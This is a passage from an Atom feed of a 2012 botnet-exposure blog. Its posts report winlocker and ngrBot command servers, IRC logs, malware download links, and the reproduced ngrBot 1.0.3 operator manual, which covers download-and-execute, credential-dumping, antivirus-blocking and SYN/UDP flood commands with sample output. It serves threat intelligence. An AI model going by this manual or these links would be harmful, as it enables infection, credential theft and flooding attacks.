type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6265736276543049091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/pooldloadasiabitcoin-miner-botnet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6265736276543049091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6265736276543049091'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/pooldloadasiabitcoin-miner-botnet.html' title='pool.dload.asia(Bitcoin Miner  Botnet hosted in France Paris Gandi)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-5589899067368297258</id><published>2012-01-27T22:16:00.000+01:00</published><updated>2012-01-27T22:16:08.831+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='winlocker'/><title type='text'>sukipuki4mokimoki.in(winlocker hosted in United States Clarks Summit Volumedrive)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-6LVR-jPsJeo/TyMRzu3Iz_I/AAAAAAAAAMM/3m1wDKCoqD4/s1600/winlocker.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="192" width="320" src="http://4.bp.blogspot.com/-6LVR-jPsJeo/TyMRzu3Iz_I/AAAAAAAAAMM/3m1wDKCoqD4/s320/winlocker.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;HTTP Query Text&lt;br /&gt;&lt;br /&gt;sukipuki4mokimoki.in GET /winlocker/1.bmp HTTP/1.1&lt;br /&gt;sukipuki4mokimoki.in GET /winlocker/2.bmp HTTP/1.1&lt;br /&gt;&lt;br /&gt;Suspicious Actions Detected&lt;br /&gt;Copies self to other locations&lt;br /&gt;Creates autorun records&lt;br /&gt;Injects code into other processes&lt;br /&gt;&lt;br /&gt;exe file&lt;br /&gt;&lt;a href="http://087ef69e.whackyvidz.com"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://f1128d34.urlbeat.net"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/199.168.139.53&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5589899067368297258?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5589899067368297258/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/sukipuki4mokimokiinwinlocker-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5589899067368297258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5589899067368297258'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/sukipuki4mokimokiinwinlocker-hosted-in.html' title='sukipuki4mokimoki.in(winlocker hosted in United States Clarks Summit Volumedrive)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-6LVR-jPsJeo/TyMRzu3Iz_I/AAAAAAAAAMM/3m1wDKCoqD4/s72-c/winlocker.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3714630198835621319</id><published>2012-01-26T00:02:00.000+01:00</published><updated>2012-01-26T00:02:56.183+01:00</updated><title type='text'>74.63.232.209(ngrBot hosted in United States New York Limestone Networks Inc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;203.249.66.5 80&lt;br /&gt;74.63.232.209 5236 PASS ROCKR&lt;br /&gt;&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |"&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD"&lt;br /&gt;PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 12 domain(s)&lt;br /&gt;NICK n{US|XPa}tkdjljt&lt;br /&gt;USER tkdjljt 0 0 :tkdjljt&lt;br /&gt;JOIN #ROCK ngrBot&lt;br /&gt;JOIN #rockspread&lt;br /&gt;JOIN #US&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/74.63.232.209&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3714630198835621319?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3714630198835621319/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/7463232209ngrbot-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3714630198835621319'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3714630198835621319'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/7463232209ngrbot-hosted-in-united.html' title='74.63.232.209(ngrBot hosted in United States New York Limestone Networks Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3706579689327857511</id><published>2012-01-25T23:41:00.000+01:00</published><updated>2012-01-25T23:41:28.681+01:00</updated><title type='text'>ch1mb4.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)</title><content type='html'>Resolved : [ch1mb4.info] To [74.62.155.207]&lt;br /&gt;&lt;br /&gt;C&amp;C Server: 74.62.155.207:6060&lt;br /&gt;Server Password: &lt;br /&gt;Username: uamethp&lt;br /&gt;Nickname: n{DE|XPa}uamethp&lt;br /&gt;Channel: #hell (Password: secret) &lt;br /&gt;Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/74.62.155.207&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3706579689327857511?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3706579689327857511/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/ch1mb4infongrbot-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3706579689327857511'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3706579689327857511'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/ch1mb4infongrbot-hosted-in-united.html' title='ch1mb4.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3161329090188179282</id><published>2012-01-23T22:59:00.000+01:00</published><updated>2012-01-23T22:59:08.823+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ngrBot 1.0.3 Manual'/><title type='text'>64.186.134.161(ngrBot 1.0.3 hosted in United States Atlanta Vpsland.com Llc)</title><content type='html'>Older version of ngrBot with the original manual included&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;64.186.134.161 7834 PASS puto&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}civmqel&lt;br /&gt;USER civmqel 0 0 :civmqel&lt;br /&gt;JOIN #dr3 ngrBot&lt;br /&gt;&lt;br /&gt;Now talking in #dr3&lt;br /&gt;Topic On: [ #dr3 ] [ &lt;&lt; #s (spreads), #f (ftps) , #l (formgrabber) , #p (pdef) , #r (ruskill) , #s (spreads) &gt;&gt; Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ]&lt;br /&gt;Topic By: [ root3d ]&lt;br /&gt;(root3d) /lusers&lt;br /&gt;&lt;br /&gt;topic says everything u have to know about ngrBot lol&lt;br /&gt;&lt;br /&gt;here i m including the manual just in case he delete it&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;Commands:&lt;br /&gt;#p - pdef(also known as the botkiller/protection)&lt;br /&gt;#r - ruskill(shows what bots you ruskilled (when selling installs you use to keep your bots)&lt;br /&gt;#f - ftps&lt;br /&gt;#l - formgrabber logins&lt;br /&gt;#s - usb, msn, facebook&lt;br /&gt;&lt;br /&gt;Note: parameters within &amp;quot;[&amp;quot; and &amp;quot;]&amp;quot; are required, and parameters within &amp;quot;&amp;lt;&amp;quot; and &amp;quot;&amp;gt;&amp;quot; are optional.&lt;br /&gt;&lt;br /&gt;    !dl [url] &amp;lt;md5&amp;gt; &amp;lt;-r&amp;gt; &amp;lt;-n&amp;gt;&lt;br /&gt;&lt;br /&gt;    The bot downloads and executes a file from the specified URL.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    url    URL of the file to download and execute&lt;br /&gt;    md5    optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot&lt;br /&gt;    -r    Enable RusKill on downloaded file&lt;br /&gt;    -n    Disables PDef+ on the system until reboot or until it is manually re-enabled&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !dl http://example.com/test.exe&lt;br /&gt;    [00:00:05] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [d=&amp;quot;http://example.com/test.exe&amp;quot; s=&amp;quot;94208 bytes&amp;quot;] Executed file &amp;quot;C:\Users\Administrator\AppData\Roaming\ABCD.tmp&amp;quot;&lt;br /&gt;    [00:00:10] &amp;lt;You&amp;gt; !dl http://example.com/bot.exe -r&lt;br /&gt;    [00:00:15] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [d=&amp;quot;http://example.com/bot.exe&amp;quot; s=&amp;quot;188416 bytes&amp;quot;] Executed file &amp;quot;C:\Users\Administrator\AppData\Roaming\1234.tmp&amp;quot;&lt;br /&gt;    [00:00:15] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Ruskill]: Detected File: &amp;quot;C:\Documents and Settings\Administrator\Application Data\1234.tmp&amp;quot;&lt;br /&gt;    [00:00:16] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Ruskill]: Detected File: &amp;quot;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lsass.exe&amp;quot;&lt;br /&gt;    [00:00:16] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Ruskill]: Detected Reg: &amp;quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&amp;quot;&lt;br /&gt;    [00:00:17] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Ruskill]: Detected DNS: &amp;quot;cnc.example.com&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !up [url] [md5] &amp;lt;-r&amp;gt;&lt;br /&gt;&lt;br /&gt;    The bot updates its file, but the update does not take effect until the system is restarted.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    url    URL of the file to update to&lt;br /&gt;    md5    MD5 hash of the update file&lt;br /&gt;    -r    Reboot immediately&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57&lt;br /&gt;    [00:00:05] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [d=&amp;quot;http://example.com/update.exe&amp;quot; s=&amp;quot;87040 bytes&amp;quot;] Update error: MD5 mismatch (857526760C0E67BB502B7183DEE52767 != 58050954C432B8786284C4E0C7011A57)&lt;br /&gt;    [00:00:15] &amp;lt;You&amp;gt; !up http://example.com/test.exe 58050954C432B8786284C4E0C7011A57&lt;br /&gt;    [00:00:20] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [d=&amp;quot;http://example.com/update.exe&amp;quot; s=&amp;quot;94208 bytes&amp;quot;] Updated bot file &amp;quot;C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;   !die&lt;br /&gt;&lt;br /&gt;    The bot disconnects from the IRC server and does not reconnect until its system reboots.&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !die&lt;br /&gt;    [00:00:01] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) Quit (Connection reset by server)&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !rm&lt;br /&gt;&lt;br /&gt;    The bot will remove itself from the system.&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !rm&lt;br /&gt;    [00:00:01] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) Quit (Connection reset by server)&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !m [state]&lt;br /&gt;&lt;br /&gt;    Enable/disable all output to IRC regarding to commands and features.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    state    Enable (on) or disable (off) muting of all output to IRC&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !m on&lt;br /&gt;    [00:00:05] &amp;lt;You&amp;gt; !v&lt;br /&gt;    [00:00:10] &amp;lt;You&amp;gt; !m off&lt;br /&gt;    [00:00:15] &amp;lt;You&amp;gt; !v&lt;br /&gt;    [00:00:16] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [v=&amp;quot;1.0.3&amp;quot; c=&amp;quot;You&amp;quot; h=&amp;quot;58050954C432B8786284C4E0C7011A57&amp;quot; p=&amp;quot;C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe&amp;quot;]&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !v&lt;br /&gt;&lt;br /&gt;    The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !v&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [v=&amp;quot;1.0.3&amp;quot; c=&amp;quot;You&amp;quot; h=&amp;quot;58050954C432B8786284C4E0C7011A57&amp;quot; p=&amp;quot;C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe&amp;quot;]&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !vs [url] [state]&lt;br /&gt;&lt;br /&gt;    The bot creates a browser instance and visits the specified link.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    url    URL to open&lt;br /&gt;    state    Open in a visible (1) or invisible (0) window&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !vs http://example.com/ 0&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Visit]: Visited &amp;quot;http://example.com/&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !rc &amp;lt;-n&amp;#124;-g&amp;gt;&lt;br /&gt;&lt;br /&gt;    The bot disconnects from the IRC server and waits 15 seconds before reconnecting.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    -n    Only reconnect if the bot is currently marked as &amp;quot;new&amp;quot;&lt;br /&gt;    -g    Only reconnect if the bot did not previously succeed in determining its country using GeoIP&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !rc&lt;br /&gt;    [00:00:01] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) Quit (Connection reset by server)&lt;br /&gt;    [00:00:16] * &amp;lt;{RU&amp;#124;W7a}gfedcba&amp;gt; (gfedcba@127.0.0.1) has joined #boss&lt;br /&gt;    [00:00:25] &amp;lt;You&amp;gt; !rc -g&lt;br /&gt;    [00:00:26] * &amp;lt;{ESP&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.2) Quit (Connection reset by server)&lt;br /&gt;    [00:00:41] * &amp;lt;{MX&amp;#124;W7a}gfedcba&amp;gt; (gfedcba@127.0.0.2) has joined #boss&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !j [&amp;lt;[rule] [options]&amp;gt; channel] &amp;lt;key&amp;gt;&lt;br /&gt;&lt;br /&gt;    The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    rule    Optional rule for the bot to check for. Supported options are -c (country) and -v (version)&lt;br /&gt;    options    Options for selected rule&lt;br /&gt;    With -c, you can put a single or multiple comma-separated country code(s)&lt;br /&gt;    With -v, you can put a single or multiple comma-separated version(s)&lt;br /&gt;    channel    Channel to join&lt;br /&gt;    key    Key of channel to join&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !j #test k3y&lt;br /&gt;    [00:00:01] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #test&lt;br /&gt;    [00:00:05] &amp;lt;You&amp;gt; !j -c RU #test2 k3y&lt;br /&gt;    [00:00:10] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #test2&lt;br /&gt;    [00:00:11] &amp;lt;You&amp;gt; !j -c US,GB,AU,CA,RU #test3 k3y&lt;br /&gt;    [00:00:15] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #test3&lt;br /&gt;    [00:00:15] &amp;lt;You&amp;gt; !j -v 1.0.3 #test4 k3y&lt;br /&gt;    [00:00:16] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #test4&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !p [&amp;lt;[rule] [options]&amp;gt; channel]&lt;br /&gt;&lt;br /&gt;    The bot parts the specified channel.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    rule    Optional rule for the bot to check for. Supported options are -c (country) and -v (version)&lt;br /&gt;    options    Options for selected rule&lt;br /&gt;    With -c, you can put a single or multiple comma-separated country code(s)&lt;br /&gt;    With -v, you can put a single or multiple comma-separated version(s)&lt;br /&gt;    channel    Channel to part&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !p #test&lt;br /&gt;    [00:00:01] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #test&lt;br /&gt;    [00:00:05] &amp;lt;You&amp;gt; !p -c RU #test2&lt;br /&gt;    [00:00:06] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #test2&lt;br /&gt;    [00:00:10] &amp;lt;You&amp;gt; !p -c US,GB,AU,CA,RU #test3&lt;br /&gt;    [00:00:11] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #test3&lt;br /&gt;    [00:00:15] &amp;lt;You&amp;gt; !p -v 1.0.3 #test4&lt;br /&gt;    [00:00:16] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #test4&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;   !s &amp;lt;rule&amp;gt;&lt;br /&gt;&lt;br /&gt;    The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    rule    Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !s&lt;br /&gt;    [00:00:01] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #RU&lt;br /&gt;    [00:00:05] &amp;lt;You&amp;gt; !s -o&lt;br /&gt;    [00:00:06] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #W7&lt;br /&gt;    [00:00:10] &amp;lt;You&amp;gt; !s -u&lt;br /&gt;    [00:00:11] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #admin&lt;br /&gt;    [00:00:15] &amp;lt;You&amp;gt; !s -v&lt;br /&gt;    [00:00:16] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has joined #1.0.3&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !us &amp;lt;rule&amp;gt;&lt;br /&gt;&lt;br /&gt;    The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    rule    Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !us&lt;br /&gt;    [00:00:01] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #RU&lt;br /&gt;    [00:00:05] &amp;lt;You&amp;gt; !us -o&lt;br /&gt;    [00:00:06] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #W7&lt;br /&gt;    [00:00:10] &amp;lt;You&amp;gt; !us -u&lt;br /&gt;    [00:00:11] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #admin&lt;br /&gt;    [00:00:10] &amp;lt;You&amp;gt; !us -v&lt;br /&gt;    [00:00:11] * &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; (abcdefg@127.0.0.1) has left #1.0.3&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !mod [module] [state]&lt;br /&gt;&lt;br /&gt;    Enable/disable modules that use hooks.&lt;br /&gt;        Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    module    Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi&lt;br /&gt;    state    Enable (on) or disable (off) module&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !mod ftpgrab off&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !stats &amp;lt;-l&amp;#124;-s&amp;gt;&lt;br /&gt;&lt;br /&gt;    Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    -l    Display login grabber stats&lt;br /&gt;    -s    Display spreading stats&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !stats&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [usb=&amp;quot;3&amp;quot; msn=&amp;quot;10&amp;quot; http=&amp;quot;2&amp;quot; total=&amp;quot;15&amp;quot;]&lt;br /&gt;    [00:00:02] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !logins &amp;lt;site&amp;#124;-c&amp;gt;&lt;br /&gt;&lt;br /&gt;    Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    site    Site to retrieve logins for (case insensitive, see here for the list of sites)&lt;br /&gt;    -c    Clear login cache&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !logins&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Logins]: Facebook -&amp;gt;&amp;gt; noob@mail.ru : password123&lt;br /&gt;    [00:00:02] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Logins]: YouTube -&amp;gt;&amp;gt; noob@mail.ru : password321&lt;br /&gt;    [00:00:05] &amp;lt;You&amp;gt; !logins facebook&lt;br /&gt;    [00:00:06] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [Logins]: Facebook -&amp;gt;&amp;gt; noob@mail.ru : password123&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !stop&lt;br /&gt;&lt;br /&gt;    The bot will end all running flood tasks.&lt;br /&gt;&lt;br /&gt;    Example&lt;br /&gt;&lt;br /&gt;    [00:00:00] &amp;lt;You&amp;gt; !udp example.com 80 60&lt;br /&gt;    [00:00:01] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [UDP]: Starting flood on &amp;quot;example.com:80&amp;quot; for 60 second(s)&lt;br /&gt;    [00:00:30] &amp;lt;You&amp;gt; !stop&lt;br /&gt;    [00:00:31] &amp;lt;{RU&amp;#124;W7a}abcdefg&amp;gt; [UDP]: Finished flood on &amp;quot;example.com:80&amp;quot;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt; &lt;br /&gt;  !ssyn [host] [port] [seconds]&lt;br /&gt;&lt;br /&gt;    See here.&lt;br /&gt;&lt;br /&gt;    Parameters&lt;br /&gt;    host    Host to flood with SYN requests&lt;br /&gt;    port    Port to flood. If 0, the bot uses a random port&lt;br /&gt;    seconds    Number of seconds to flood the 